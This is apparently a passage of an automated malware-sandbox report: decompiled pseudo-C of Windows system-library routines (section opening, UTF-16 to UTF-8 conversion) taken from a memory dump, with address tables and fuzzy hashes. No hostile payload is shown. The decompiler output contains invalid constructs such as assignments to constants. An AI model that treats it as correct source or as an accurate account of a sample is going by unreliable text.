						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0388D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03862280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03864620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0388F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0385FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x393b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0388B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x03875142
0x0387514c
0x03875150
0x03875157
0x03875159
0x0387515e
0x03875165
0x03875169
0x0387516c
0x03875172
0x03875176
0x0387517a
0x0387517a
0x0387517a
0x0387517f
0x038b6d8b
0x038b6d8e
0x038b6d91
0x038b6d95
0x038b6d98
0x038b6d9c
0x038b6da0
0x038b6da3
0x038b6da7
0x038b6e26
0x038b6e26
0x038b6e2a
0x038751f9
0x038751f9
0x038751fe
0x038b6e33
0x038b6e33
0x038b6e39
0x038b6e3d
0x038b6e46
0x038b6e50
0x00000000
0x00000000
0x038b6e52
0x038b6e53
0x038b6e56
0x038b6e5d
0x00000000
0x00000000
0x00000000
0x038b6e5f
0x038b6e67
0x038b6e77
0x038b6e7f
0x038b6e80
0x038b6e88
0x038b6e90
0x038b6e9f
0x038b6ea5
0x038b6ea9
0x038b6eb1
0x038b6ebf
0x00000000
0x00000000
0x038b6ecf
0x038b6ed3
0x00000000
0x00000000
0x038b6edb
0x038b6ede
0x038b6ee1
0x038b6ee8
0x038b6eeb
0x038b6eed
0x038b6ef0
0x038b6ef4
0x038b6ef8
0x038b6efc
0x00000000
0x00000000
0x038b6f0d
0x038b6f11
0x038b6f32
0x038b6f37
0x038b6f3b
0x038b6f3e
0x038b6f41
0x038b6f46
0x00000000
0x00000000
0x038b6f4c
0x038b6f50
0x038b6f50
0x038b6f54
0x038b6f62
0x038b6f65
0x038b6f6d
0x038b6f7b
0x038b6f7b
0x038b6f93
0x038b6f98
0x038b6fa0
0x038b6fa6
0x038b6fb3
0x038b6fb6
0x038b6fbf
0x038b6fc1
0x038b6fd5
0x038b6fda
0x038b6fda
0x038b6fdd
0x038b6fe2
0x038b6fe7
0x038b6feb
0x038b6fef
0x038b6ff3
0x0387520c
0x0387520c
0x0387520f
0x03875215
0x03875234
0x0387523a
0x0387523a
0x03875244
0x03875245
0x03875246
0x03875251
0x03875251
0x038b6f13
0x038b6f17
0x038b6f17
0x038b6f18
0x038b6f1b
0x038b6f1f
0x038b6f23
0x00000000
0x038b6f28
0x03875204
0x03875204
0x03875208
0x00000000
0x03875208
0x03875185
0x03875188
0x0387518a
0x0387518e
0x03875195
0x038b6db1
0x038b6db5
0x038b6db9
0x0387519b
0x0387519b
0x0387519e
0x038751a7
0x038751a9
0x038751a9
0x038751b5
0x038751b8
0x038751bb
0x038751be
0x038751c1
0x038751c5
0x038751c9
0x038751cd
0x038751cd
0x038751d8
0x038751dc
0x038751e0
0x038b6dcc
0x038b6dd0
0x038b6dd5
0x038b6ddd
0x038b6de1
0x038b6de1
0x038b6de5
0x038b6deb
0x038b6df1
0x038b6df7
0x038b6dfd
0x038b6e01
0x038b6e05
0x038b6e09
0x038b6e0d
0x038b6e11
0x038b6e11
0x038751eb
0x038b6e1a
0x038b6e1f
0x038b6e21
0x038b6e23
0x00000000
0x038751f1
0x038751f1
0x00000000
0x038751f1

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50127dca2a87a9150f4ba793ea54796a73194e543e1c52c42f9010bc8d0126e7
Instruction ID: c74f9cc303ba938d6eb90bf324a8aeab254f73c9c6a2d5d6203e4050ba368169
Opcode Fuzzy Hash: 50127dca2a87a9150f4ba793ea54796a73194e543e1c52c42f9010bc8d0126e7
Instruction Fuzzy Hash: 6BC120755083818FD354CF68C480A5AFBF1BF89308F184AAEF8998B352D771E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 038703E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E038703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x393d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03870548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0388B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0385B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3937c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03867D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03867D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E038C7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03889830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E038C69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3937c04 != 0) {
						_t118 = _v12;
						_t120 = E038CA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3937bd8;
						if( *0x3937bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E038895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E038899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E038C3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0384B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0388AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3938474 - 3;
										if( *0x3938474 != 3) {
											 *0x39379dc =  *0x39379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03867D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03867D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E038C7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3938708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3937b00; // 0x0
							asm("ror esi, cl");
							 *0x393b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E038895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03857F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x038703f1
0x038703f7
0x038703f9
0x038703fb
0x038703fd
0x03870400
0x0387040a
0x038b4c7a
0x03870537
0x03870547
0x03870410
0x03870410
0x03870414
0x03870417
0x0387041a
0x03870421
0x03870424
0x0387042b
0x0387043b
0x0387043e
0x0387043f
0x0387043f
0x03870446
0x03870449
0x0387044c
0x0387044f
0x03870459
0x038b4c8d
0x0387045f
0x0387045f
0x0387045f
0x03870467
0x038b4c97
0x038b4c9d
0x038b4ca4
0x038b4caa
0x038b4caf
0x038b4cb1
0x038b4cc3
0x038b4cb3
0x038b4cbc
0x038b4cbc
0x038b4cc8
0x038b4ccb
0x038b4cd7
0x038b4cda
0x038b4cdf
0x038b4cdf
0x038b4ccb
0x038b4ca4
0x0387046d
0x0387046f
0x0387046f
0x03870471
0x03870476
0x0387047a
0x0387047b
0x03870483
0x03870489
0x0387048d
0x00000000
0x00000000
0x038b4ce9
0x038b4cef
0x038b4d22
0x038b4d22
0x00000000
0x038b4d22
0x038b4cf1
0x038b4cf7
0x00000000
0x00000000
0x038b4cf9
0x038b4cff
0x00000000
0x00000000
0x038b4d05
0x038b4d07
0x00000000
0x00000000
0x038b4d0d
0x038b4d0f
0x038b4d14
0x038b4d16
0x00000000
0x00000000
0x038b4d1c
0x038b4d1c
0x03870499
0x03870535
0x03870535
0x00000000
0x03870535
0x038704a6
0x038b4d2c
0x038b4d37
0x038b4d39
0x038b4d3b
0x00000000
0x00000000
0x038b4d41
0x038b4d48
0x03870527
0x0387052b
0x0387052d
0x03870530
0x03870530
0x00000000
0x0387052b
0x038b4d4e
0x038704ac
0x038704ac
0x038704af
0x038704b2
0x038704b7
0x038704b9
0x038704bb
0x038704bd
0x038704bf
0x038704c5
0x038704c9
0x038b4d53
0x038b4d59
0x038b4db9
0x038b4dba
0x038b4dbf
0x038b4dc2
0x038b4dc4
0x038b4dc7
0x038b4dce
0x00000000
0x038b4dce
0x038b4d5b
0x038b4d61
0x00000000
0x00000000
0x038b4d63
0x038b4d69
0x00000000
0x00000000
0x038b4d6b
0x038b4d6e
0x038b4d74
0x038b4d76
0x038b4d7c
0x038b4d7e
0x038b4d84
0x038b4d89
0x038b4d8c
0x038b4d8d
0x038b4d92
0x038b4d95
0x038b4d96
0x038b4d98
0x038b4d9a
0x038b4d9f
0x038b4da4
0x038b4da6
0x038b4da8
0x038b4daf
0x038b4db1
0x038b4db1
0x038b4daf
0x038b4da6
0x038b4d84
0x038b4d7c
0x00000000
0x038b4d74
0x038704d6
0x038b4de1
0x038704dc
0x038704dc
0x038704dc
0x038704e4
0x038b4deb
0x038b4df1
0x038b4df8
0x038b4dfe
0x038b4e03
0x038b4e05
0x038b4e17
0x038b4e07
0x038b4e10
0x038b4e10
0x038b4e1c
0x038b4e1f
0x038b4e35
0x038b4e35
0x038b4e1f
0x038b4df8
0x038704f1
0x038704fa
0x038b4e3f
0x038b4e47
0x038b4e5b
0x038b4e61
0x038b4e67
0x038b4e69
0x038b4e71
0x038b4e73
0x03870500
0x03870500
0x03870500
0x038704fa
0x03870508
0x0387051d
0x0387051d
0x0387051f
0x03870524
0x00000000
0x03870524
0x03870515
0x03870517
0x038b4e7a
0x038b4e7c
0x00000000
0x00000000
0x038b4e85
0x00000000
0x038b4e85
0x00000000
0x03870517

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3832ba72ea54ab62a7048b7353e2a13b95fdb66e76dc76bec7ae1320ae385fe
Instruction ID: c454c09e29ed3dce6d91df846ee9caffd780e9259eecd50bf6a24107a9e5995f
Opcode Fuzzy Hash: b3832ba72ea54ab62a7048b7353e2a13b95fdb66e76dc76bec7ae1320ae385fe
Instruction Fuzzy Hash: EE9127B1E003599BDB21DBE9C845BADBBB5AB01768F0902E1E911EB2D2D774DD40C781

Uniqueness

Uniqueness Score: -1.00%

Function 0387EBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0387EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0387ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x0387ebb8
0x0387ebbf
0x0387ebc1
0x0387ebc6
0x00000000
0x038bb6d6
0x0387ebcd
0x0387ebd2
0x0387ec95
0x038bb6e0
0x0387ec9b
0x0387eca1
0x0387eca1
0x0387ec89
0x00000000
0x0387ec89
0x0387ebd8
0x0387ebdd
0x038bb6ea
0x00000000
0x0387ebe3
0x0387ebe5
0x0387ebe7
0x0387ebef
0x0387ebf2
0x00000000
0x0387ebf5
0x00000000
0x0387ebf5
0x0387ebf5
0x0387ebf7
0x038bb6f6
0x0387ec7c
0x0387ec7c
0x0387ec7f
0x0387ec82
0x0387ec87
0x00000000
0x0387ec87
0x0387ec1a
0x0387ec1a
0x0387ec25
0x038bb725
0x038bb72c
0x038bb72c
0x0387ec2d
0x0387ec31
0x038bb73c
0x038bb744
0x038bb748
0x038bb748
0x038bb749
0x038bb749
0x038bb74a
0x038bb74a
0x0387ec3e
0x038bb860
0x00000000
0x0387ec44
0x0387ec47
0x038bb750
0x038bb758
0x038bb767
0x038bb775
0x038bb77c
0x038bb77f
0x038bb769
0x038bb76c
0x038bb76c
0x038bb781
0x038bb788
0x038bb78b
0x038bb75a
0x038bb75d
0x038bb75d
0x038bb78d
0x038bb792
0x038bb793
0x038bb793
0x0387ec54
0x0387ec56
0x0387ec57
0x0387ec59
0x0387ec5e
0x0387ecaa
0x0387ed16
0x0387ed16
0x0387ecac
0x0387ecaf
0x0387ecb4
0x0387ecb6
0x0387ecb6
0x0387ecb9
0x0387ecbf
0x038bb7c1
0x038bb7c8
0x038bb7d3
0x038bb7db
0x038bb7ec
0x038bb858
0x00000000
0x038bb858
0x038bb7ee
0x038bb7f1
0x038bb7f4
0x038bb7ff
0x038bb850
0x00000000
0x038bb850
0x038bb80a
0x038bb813
0x038bb81c
0x038bb81d
0x038bb822
0x038bb825
0x038bb828
0x038bb831
0x038bb832
0x038bb837
0x038bb840
0x038bb842
0x038bb845
0x038bb848
0x00000000
0x038bb848
0x038bb7df
0x00000000
0x038bb7df
0x038bb7cc
0x00000000
0x038bb7cc
0x0387ecc5
0x0387ecc7
0x0387eccb
0x038bb79b
0x038bb79e
0x038bb7a4
0x00000000
0x00000000
0x038bb7a6
0x038bb7a8
0x038bb7a8
0x0387ecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0387ecd5
0x0387ecd5
0x0387ecd5
0x0387ecd8
0x0387ecda
0x0387ece4
0x00000000
0x00000000
0x0387ecea
0x0387eced
0x0387ecf0
0x0387ecf2
0x0387ecfb
0x0387ecfe
0x0387ed01
0x0387ed06
0x00000000
0x00000000
0x00000000
0x0387ed06
0x038bb7ae
0x038bb7b1
0x038bb7b7
0x00000000
0x00000000
0x038bb7b9
0x038bb7bb
0x0387ed08
0x0387ed08
0x0387ed0c
0x0387ed0c
0x00000000
0x0387ec60
0x0387ec62
0x0387ed0f
0x0387ed0f
0x00000000
0x0387ed0f
0x0387ec68
0x0387ec6c
0x0387ec6f
0x0387ec75
0x0387ec0d
0x0387ec0d
0x0387ec18
0x00000000
0x00000000
0x00000000
0x0387ec18
0x0387ec77
0x0387ec79
0x0387ec79
0x00000000
0x0387ec68
0x0387ec5e
0x0387ec3e
0x0387ebfd
0x0387ec02
0x038bb701
0x038bb70c
0x038bb71b
0x038bb71d
0x038bb71d
0x00000000
0x038bb70c
0x0387ec08
0x0387ec0a
0x00000000
0x0387ec0a
0x0387ebf5
0x0387ebf5

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 7f8e06f54ba838f84dc903227fbc98c182d637f5a94e92bb6bba0ffb5fd090d7
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 22813A25A1425B8FDB22CEECC4C02BDBB66EF92314B2C45FAD852CB341C225E846D795

Uniqueness

Uniqueness Score: -1.00%

Function 03911D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E03911D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
